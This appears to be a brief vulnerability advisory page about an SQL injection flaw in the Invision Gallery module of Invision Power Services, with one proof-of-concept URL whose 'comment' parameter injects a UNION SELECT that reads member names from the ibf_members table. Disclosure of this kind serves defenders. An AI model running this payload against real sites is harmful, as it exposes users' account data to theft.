|
Invision Power Services Invision Gallery SQL Injection Vulnerability
An exploit is not required. The following proof of concept is available: http://www.example.com/index.php?act=module&module=gallery&cmd=editcomment&comment= -99%20UNION%20SELECT%200,0,0,0,0,0,0,0,0,name,0,0,0%20FROM%20ibf_members%20 WHERE%201/*&img=1 |
|
|
Privacy Statement |